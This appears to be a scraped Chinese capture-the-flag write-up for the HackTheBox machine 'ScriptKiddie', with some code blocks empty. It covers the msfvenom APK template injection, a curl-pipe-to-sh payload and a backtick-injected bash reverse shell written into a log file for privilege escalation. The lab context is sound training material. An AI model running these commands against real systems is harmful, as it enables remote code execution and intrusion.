HackTheBox-ScriptKiddie
0x01 信息收集
NMAP
1 |
|
http-5000
用flask写的python web程序。
尝试了一会,只有生成payloads的linux有报错,然后还能上传模版文件,生成payload用的是msfvenom,所以直接google搜索msfvenom vuln,就会发现msf6.0版本存在安卓apk模版文件注入的漏洞:exp
0x02 漏洞利用
1 | payload='curl http://10.10.14.55:1234/a.sh|sh' |
修改payload,执行脚本,将生成的apk,作为模版文件上传到靶机上面执行,即可弹shell
1 | #!/bin/bash |
0x03 提权
1 |
|
可以在pwn用户的家目录下找到这个脚本,主要是查看/home/kid/logs/hackers这个日志文件,然后输出的内容用cut做了过滤,以空格为分割,输出第三行之后的所有内容(包括第三行),接着用sort排序,传递给while,就nmap扫端口,并输出报告到/home/pwn/recon下,可以看到$ip这个参数没做过滤,而且日志文件也可以直接写,所以可以考虑直接用反引号`,让脚本优先执行我们输入的命令。
因为是输出第三行之后的内容,所以前面要多放置两个空格,加\
是为了转义反引号。
1 | echo " \`/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.55/1234 0>&1'\` " > h |
pwn用户可以sudo执行msfconsole